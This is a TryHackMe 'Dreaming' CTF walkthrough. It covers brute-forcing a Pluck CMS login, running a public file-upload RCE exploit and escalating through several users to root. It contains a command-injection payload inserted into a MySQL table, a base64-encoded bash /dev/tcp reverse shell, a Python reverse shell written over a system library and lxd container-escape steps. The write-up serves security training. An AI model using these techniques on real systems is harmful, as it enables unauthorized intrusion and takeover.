🤤Dreaming TryHackMe Writeup CTF

While the king of dreams was imprisoned, his home fell into ruins. Can you help Sandman restore his kingdom?

Recon

First let's use rustscan to check for live ports on the target

# I use rustscan, you may use nmap
rustscan -a TARGET_IP -- -A -sC

# Expected Output
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 762667a6b0080eed34585b4e77459257 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDDwLHu8L86UCKGGVbbYL07uBhmOh9hWLPtBknNwMgULG3UGIqmCT3DywDvtEYZ/6D97nrt6PpsVAu0/gp73GYjUxvk4Gfog9YFShodiB/VJqK4RC23h0oNoAElSJajjEq6JcVaEyub6w8Io50fk4nNhf8dPx0YSaRjKANr9mET6s+4cUNBAF/DknsZw6iYtafzxIQTAtgSX6AtXTXRf5cpdF02wwYvUo1jVSYdXL+Oqx19UADVhQib4Pt5gLAiwuFkoJjnN1L6xwkTjd+sUPVlhQ/6yHfB826/Qk55DWoUrnABfe+3jngyPvjl1heYDuPx01rtDvlDDGAwvriwR7XmX+8X7MZ9E9QOx/m2gEHZ83kuJ9jNLB6WjlqCyA4Zes+oHWbM9Q/nJ/UVQGdfcDS65edQ5m/fw2khqUbCeSFcuD3AQvUJvvFrfg/eTNnhpee/WYJjyZO70tlzhaT/oJheodQ1hQyfgnjwToy/ISHn9Yp4jeqrshBUF87x9kUuLV0=
|   256 523aad267f6e3f23f9e4efe85ac8425c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCmisKYJLewSTob1PZ06N0jUpWdArbsaHK65lE8Lwefkk3WFAwoTWvStQbzCJlo0MF+zztRtwcqmHc5V7qawS8E=
|   256 71df6e81f0807971a8da2e1e56c4debb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK3j+g633Muvqft5oYrShkXdV0Rjn2S1GQpyXyxoPJy0
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Seems, like only 2 ports are open.

When visiting the ip address on port 80, it's just a default apache page. Nothing interesting.

Let's use directory bruteforcing.

dirsearch -u http://dreaming.thm -o $(pwd)/dirsearch.log

403   277B   http://dreaming.thm/.ht_wsr.txt
403   277B   http://dreaming.thm/.htaccess.bak1
403   277B   http://dreaming.thm/.htaccess.orig
403   277B   http://dreaming.thm/.htaccess.sample
403   277B   http://dreaming.thm/.htaccess.save
403   277B   http://dreaming.thm/.htaccess_extra
403   277B   http://dreaming.thm/.htaccess_orig
403   277B   http://dreaming.thm/.htaccess_sc
403   277B   http://dreaming.thm/.htaccessBAK
403   277B   http://dreaming.thm/.htaccessOLD2
403   277B   http://dreaming.thm/.htaccessOLD
403   277B   http://dreaming.thm/.htm
403   277B   http://dreaming.thm/.html
403   277B   http://dreaming.thm/.htpasswds
403   277B   http://dreaming.thm/.htpasswd_test
403   277B   http://dreaming.thm/.httr-oauth
403   277B   http://dreaming.thm/.php
301   310B   http://dreaming.thm/app    -> REDIRECTS TO: http://dreaming.thm/app/
200   450B   http://dreaming.thm/app/
403   277B   http://dreaming.thm/server-status/
403   277B   http://dreaming.thm/server-status

We now have an interesting endpoint /app let's take a look!

Hmmm, interesting.... once we visit the directory of pluck we get a welcome page along with a login page link. Please note that the version of pluck is 4.7.13

Since we don't know the password, neither do we have any breadcrumbs for password, we can try to use bruteforce to get the password, via burpsuite intruder.

I am using the rockyou.txt for buteforcing, Look out for response length 1464, you should have the password.

Once we have the correct password, lets checkout for some exsisting vulnerabilites on this particular version of Pluck.

# Use the searchsploit to get exploit information
searchsploit  pluck 4.7.13
# Expected output
---------------------------------------------------------------------- ----------------------
 Exploit Title                                                        |  Path
---------------------------------------------------------------------- ----------------------
Pluck CMS 4.7.13 - File Upload Remote Code Execution (Authenticated)  | php/webapps/49909.py
---------------------------------------------------------------------------------------------
Shellcodes: No Results
Papers: No Results

Initial Foothold

You may now copy the exploit code and run with following command!

cp $(locate php/webapps/49909.py) .
mv 49909.py exploit.py
python exploit.py TARGET_IP 80 TARGET_PASSWORD /app/pluck-4.7.13/

If you successfully did that, you will be provided a link to webshell

http://TARGET_IP:80/app/pluck-4.7.13//files/shell.phar

Exploitation

Once we visit the page, you have webshell waiting for your commands. now what you can do is get a revershell back that way it will be much easier to control the system. Use the revshells.com

Now get a reverse shell

One thing to note is that you may need to use base64 encoding/decoding to inject a revershell via the web shell

Once we get inside, we need to find the first flag, but its read protected

4 drwxr-xr-x 6 lucien lucien 4096 Nov 19 17:53 .
4 drwxr-xr-x 5 root   root   4096 Jul 28 22:26 ..
4 -rw------- 1 lucien lucien 1877 Nov 19 18:03 .bash_history
4 -rw-r--r-- 1 lucien lucien  220 Feb 25  2020 .bash_logout
4 -rw-r--r-- 1 lucien lucien 3771 Feb 25  2020 .bashrc
4 drwx------ 3 lucien lucien 4096 Jul 28 18:42 .cache
4 drwxrwxr-x 4 lucien lucien 4096 Jul 28 18:42 .local
4 -rw-rw---- 1 lucien lucien   19 Jul 28 16:27 lucien_flag.txt
4 -rw------- 1 lucien lucien  899 Nov 19 17:44 .mysql_history
4 -rw-r--r-- 1 lucien lucien  807 Feb 25  2020 .profile
4 drwx------ 3 lucien lucien 4096 Nov 19 17:53 snap
4 drwx------ 2 lucien lucien 4096 Jul 28 14:25 .ssh
0 -rw-r--r-- 1 lucien lucien    0 Jul 28 14:28 .sudo_as_admin_successful

Intended Path - Hacking Lucien

We can look into /opt directory for usefull scripts that maybe helpful

total 16K
drwxr-xr-x  2 root   root   4.0K Aug 15 12:45 .
drwxr-xr-x 20 root   root   4.0K Jul 28 22:35 ..
-rwxrw-r--  1 death  death  1.6K Aug 15 12:45 getDreams.py
-rwxr-xr-x  1 lucien lucien  483 Aug  7 23:36 test.py

Interesting files!, lets check test.py

import requests

#Todo add myself as a user
url = "http://127.0.0.1/app/pluck-4.7.13/login.php"
password = "HeyLu#####REDACTED####!"

data = {
        "cont1":password,
        "bogus":"",
        "submit":"Log+in"
        }

req = requests.post(url,data=data)

if "Password correct." in req.text:
    print("Everything is in proper order. Status Code: " + str(req.status_code))
else:
    print("Something is wrong. Status Code: " + str(req.status_code))
    print("Results:\n" + req.text)

we get the password for Lucien!, lets login using ssh and get our flag

Get Lucien Flag

lucien@dreaming:~$ cat lucien_flag.txt 
THM{TH3_########REDACTED######}

Intended Path - Hacking Death

Check if there is any program that can be run as root to get an easy hack.

sudo -l
## Expected Output
lucien@dreaming:~$ sudo -l
Matching Defaults entries for lucien on dreaming:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lucien may run the following commands on dreaming:
    (death) NOPASSWD: /usr/bin/python3 /home/death/getDreams.py

So we can run a python script without any password using sudo!

Now let's check the other file in the /opt folder!

cat /opt/getDreams.py # we can assume a copy of this script is being used

import mysql.connector
import subprocess

# MySQL credentials
DB_USER = "death"
DB_PASS = "#redacted"
DB_NAME = "library"

import mysql.connector
import subprocess

def getDreams():
    try:
        # Connect to the MySQL database
        connection = mysql.connector.connect(
            host="localhost",
            user=DB_USER,
            password=DB_PASS,
            database=DB_NAME
        )

        # Create a cursor object to execute SQL queries
        cursor = connection.cursor()

        # Construct the MySQL query to fetch dreamer and dream columns from dreams table
        query = "SELECT dreamer, dream FROM dreams;"

        # Execute the query
        cursor.execute(query)

        # Fetch all the dreamer and dream information
        dreams_info = cursor.fetchall()

        if not dreams_info:
            print("No dreams found in the database.")
        else:
            # Loop through the results and echo the information using subprocess
            for dream_info in dreams_info:
                dreamer, dream = dream_info
                command = f"echo {dreamer} + {dream}"
                shell = subprocess.check_output(command, text=True, shell=True)
                print(shell)

    except mysql.connector.Error as error:
        # Handle any errors that might occur during the database connection or query execution
        print(f"Error: {error}")

    finally:
        # Close the cursor and connection
        cursor.close()
        connection.close()

# Call the function to echo the dreamer and dream information
getDreams()

As per the code, we don't have the password for the user death, but if you look closely there is a for loop from line 37-42 which prints the data from the database, we need to hijack the process there.

What we can simply do is use a bash payload in the library database, itself so when it prints the data, it will terminate the line and execute our payload.

But first we need to get the password for the database! the best place to look for is the .bash_history file.

cat /home/lucien/.bash_history

# expected output
...
clear
clear
su root
cd ~~
cd ~
clear
ls
mysql -u lucien -plucie####REDACTED####
ls -la
cat .bash_history 
cat .mysql_history 
clear
ls
ls -la
rm .mysql_history 
clear
...

As you can see, after the -p argument there is a password, lets use that to connect to the library database.

mysql -u lucien -p -D libary # since the DB_NAME in the script is for library

# Get the tables
mysql> show tables;
+-------------------+
| Tables_in_library |
+-------------------+
| dreams            |
+-------------------+
1 row in set (0.00 sec)

# Check the data
mysql> select * from dreams;
+---------+------------------------------------+
| dreamer | dream                              |
+---------+------------------------------------+
| Alice   | Flying in the sky                  |
| Bob     | Exploring ancient ruins            |
| Carol   | Becoming a successful entrepreneur |
| Dave    | Becoming a professional musician   |
+---------+------------------------------------+
4 rows in set (0.00 sec)

# Now Let's append our bash payload to check if it works or not
mysql> insert into dreams (dreamer,dream) values ("payload",";id");
Query OK, 1 row affected (0.01 sec)

Now execute the script like this

sudo -u death /usr/bin/python3 /home/death/getDreams.py

lucien@dreaming:~$ sudo -u death /usr/bin/python3 /home/death/getDreams.py
Alice + Flying in the sky

Bob + Exploring ancient ruins

Carol + Becoming a successful entrepreneur

Dave + Becoming a professional musician

payload +
uid=1001(death) gid=1001(death) groups=1001(death)

As you can see along with the data, we can execute our bash payloads!

Time to pivot, use the revshells.com to generate a reverse shell payload, select the encoding as base64.

Now do the same like previously, login to database and insert the payload like the following

mysql> insert into dreams (dreamer,dream) values ("payload",";echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvd#######MjU1LzY5IDA+JjE=|base64 -d|bash");

And open the netcat listener in your own machine and execute the script again to get the shell!

Get the flag!

Intended Path - Hack Morpheus

Let's get back to /home/morpheus check for files that we can read or write to.

ls -laSh
-rw-r--r-- 1 morpheus morpheus 3771 Feb 25  2020 .bashrc
-rw-rw-r-- 1 morpheus morpheus   22 Jul 28 22:37 kingdom
drwxrwxr-x 3 morpheus morpheus 4096 Jul 28 22:30 .local
-rw-rw---- 1 morpheus morpheus   28 Jul 28 22:29 morpheus_flag.txt
-rw-r--r-- 1 morpheus morpheus  807 Feb 25  2020 .profile
-rw-rw-r-- 1 morpheus morpheus  180 Aug  7 23:48 restore.py
-rw-rw-r-- 1 morpheus morpheus   66 Jul 28 22:33 .selected_editor

As you can see, there is restore.py python script, let's investigate!

from shutil import copy2 as backup

src_file = "/home/morpheus/kingdom"
dst_file = "/kingdom_backup/kingdom"

backup(src_file, dst_file)
print("The kingdom backup has been done!")

The program makes a backup copy of a file, but uses a library shutil.

We can check if we have any read or write privileges on that library itself.

death@dreaming:/home/morpheus$ find / -name "shutil.py" -type f 2>/dev/null
# Expected Output
/usr/lib/python3.8/shutil.py
/snap/core20/1974/usr/lib/python3.8/shutil.py
/snap/core20/2015/usr/lib/python3.8/shutil.py

Let's check the first file

death@dreaming:/home/morpheus$ ls -laSh /usr/lib/python3.8/shutil.py
-rw-rw-r-- 1 root death 51K Aug  7 23:52 /usr/lib/python3.8/shutil.py

The user death is in group, so we can write into the file.

The best way to do it using the revshells.com again and generate a python payload! only copy the selected part of the payload like the following.

Go to this website : https://www.base64encode.org/

And encode our payload to generate the base64 payload.

Then insert the payload to shutil.py.

echo aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNz....YOUR_BASE64_PAYLOAD |base64 -d > /usr/lib/python3.8/shutil.py

Open your netcat/pwncat listner, and wait for the shell.

Get the Flag!

Unintended Path - Get Root and other flags! ( Patched!!!! ) 😭

Since I didn't want this writeup to be long, let's try to get root and leave the rest of the users and other enumeration.

If we use id command we can see that our user lucien is in lxd group, we are in luck!

lucien@dreaming:/home$ id
uid=1000(lucien) gid=1000(lucien) groups=1000(lucien)....117(lxd)

Use the following command on your own machine, to create an alpine image!

sudo su
#Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
git clone https://github.com/lxc/distrobuilder
#Make distrobuilder
cd distrobuilder
make
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18

Then, upload to the vulnerable server the files lxd.tar.xz and rootfs.squashfs

Add the image:

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image

Once done, if you see your image listed we are good to go for the next few steps!

lxc init # it will ask you a couple of questions just keep hiting return
lxc init alpine privesc -c security.privileged=true
lxc list #List containers

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

If you find this error Error: No storage pool found. Please create a new storage pool Run lxd init and repeat the previous chunk of commands

Execute the container:

lxc start privesc
lxc exec privesc /bin/sh
cd /mnt/root # this where the main filesystem is mounted

Get Death Flag

Since you have the root permission you have the freedom to read any files of any users!

# Death Flag
root@dreaming:/home# cat /home/death/death_flag.txt
THM{1M_TH3R3_####REDACTED#####}

Get Morpheus Flag

# Morpheus Flag
root@dreaming:/home# cat /home/morpheus/morpheus_flag.txt 
THM{DR34MS_####REDACTED#######}

Thank you for reading! 😎 Keep Learning & Happy Hunting! ❤️

Last updated 2 years ago

Was this helpful?

Table of Contents

Recon

Initial Foothold

Exploitation

Intended Path - Hacking Lucien

Get Lucien Flag

Intended Path - Hacking Death

Intended Path - Hack Morpheus

Unintended Path - Get Root and other flags! ( Patched!!!! ) 😭

Get Death Flag

Get Morpheus Flag